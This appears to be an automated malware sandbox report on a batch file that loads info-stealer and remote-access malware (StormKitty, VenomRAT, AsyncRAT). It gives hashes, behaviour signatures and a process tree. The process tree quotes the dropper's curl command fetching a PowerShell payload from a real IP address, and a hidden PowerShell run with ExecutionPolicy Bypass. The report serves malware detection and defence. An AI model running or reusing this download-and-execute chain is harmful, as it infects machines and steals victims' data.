Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-01-2025 07:57
Static task
static1
Behavioral task
behavioral1
Sample
gqub.bat
Resource
win7-20241010-en
General
-
Target
gqub.bat
-
Size
3KB
-
MD5
bb445d197063475c8d78de4f0825753c
-
SHA1
158a8e3b278affe7c1185aad67683e4253cf53dd
-
SHA256
7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10
-
SHA512
173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/3644-30-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
resource yara_rule behavioral2/memory/3644-30-0x0000000000400000-0x0000000000704000-memory.dmp VenomRAT -
Venomrat family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 2112 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2112 powershell.exe -
Downloads MZ/PE file
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2112 set thread context of 3644 2112 powershell.exe 90 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe 2112 powershell.exe 3644 RegAsm.exe 3644 RegAsm.exe 3644 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2112 powershell.exe Token: SeDebugPrivilege 3644 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3644 RegAsm.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4736 wrote to memory of 4640 4736 cmd.exe 84 PID 4736 wrote to memory of 4640 4736 cmd.exe 84 PID 4736 wrote to memory of 2112 4736 cmd.exe 85 PID 4736 wrote to memory of 2112 4736 cmd.exe 85 PID 4640 wrote to memory of 2516 4640 cmd.exe 86 PID 4640 wrote to memory of 2516 4640 cmd.exe 86 PID 2112 wrote to memory of 4220 2112 powershell.exe 87 PID 2112 wrote to memory of 4220 2112 powershell.exe 87 PID 4220 wrote to memory of 4680 4220 csc.exe 88 PID 4220 wrote to memory of 4680 4220 csc.exe 88 PID 2112 wrote to memory of 640 2112 powershell.exe 89 PID 2112 wrote to memory of 640 2112 powershell.exe 89 PID 2112 wrote to memory of 640 2112 powershell.exe 89 PID 2112 wrote to memory of 3644 2112 powershell.exe 90 PID 2112 wrote to memory of 3644 2112 powershell.exe 90 PID 2112 wrote to memory of 3644 2112 powershell.exe 90 PID 2112 wrote to memory of 3644 2112 powershell.exe 90 PID 2112 wrote to memory of 3644 2112 powershell.exe 90 PID 2112 wrote to memory of 3644 2112 powershell.exe 90 PID 2112 wrote to memory of 3644 2112 powershell.exe 90 PID 2112 wrote to memory of 3644 2112 powershell.exe 90
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\gqub.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\system32\cmd.execmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps12⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\system32\curl.execurl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps13⤵PID:2516
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2klvbn4y\2klvbn4y.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87AE.tmp" "c:\Users\Admin\AppData\Local\Temp\2klvbn4y\CSCAC9824FFF7054DC3A13E30D512ACB598.TMP"4⤵PID:4680
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:640
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3644
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9KB
MD5c4df261a9ae58c59b122f781b70be7b9
SHA1791625d4f4c489553fc9caf509b0236d68769086
SHA256f9d7e38779241516cde0dd57b4df2bcabca365b19c152b33eb478289fc8320fd
SHA5126facf68507a8a963e741aca502aff510535940a95bb1e3f5da27a3db4f11f0a7ebb828ef86f1258ee167fc8ed2f25e0e34442c3fe953c976c5969cfac20989d1
-
Filesize
1KB
MD505bc4730b0a1bb796a290f7a8786be63
SHA1a4953d68f5f69c42221f725790a9980433b1baa5
SHA25640f144cd3b581530beee300fe01e63cfa03a788988db5efeb477234fec6f18f1
SHA512f5bd9602562389c42277203c165e56fca62a9f3b59b8baa1955c27911e5b1347743bbdbfbb6ffeeeee6969ad9c0e62b64fd18a42f9c36ef75b704052c480f1cf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10KB
MD5b5c3a2d03ff4c721192716f326c77dea
SHA16b754fd988ca58865674b711aba76d3c6b2c5693
SHA256ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac
SHA512d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248
-
Filesize
204B
MD50ee963805c9eff55930fb30aa0e8b6ba
SHA1329ab0d2648179f70902bccd22d8021076b67092
SHA25690606e03ea98cb65b3ce247200fd28108f3ccce133eed496aee91b7d842c32dc
SHA51270b8e5062774f82053424c454ce9a0390ce3e6ecb1e739b0674b3e046da76b56d1b146bb62290d0c4f8a840f8936b1d7d794af9264f27d295e22db58c4eb6e88
-
Filesize
652B
MD540f41e17b2b514c8005a46ca03e7f52b
SHA18e6aa689f664aad0b14d0536bb642a36ad4f2049
SHA2567cea7cc056f9c86b048202da9bc4da7e95b2ac9976b057aad815a28e3fb71fc8
SHA512ed3e8a91dbbbfb923d407f892005fd9e8c1cd9925a5b58b4cb86b2e73f91936fdaafd2332e2b45aec9d864c52e01f665828b67a3c77a71e5905c15fe30848f18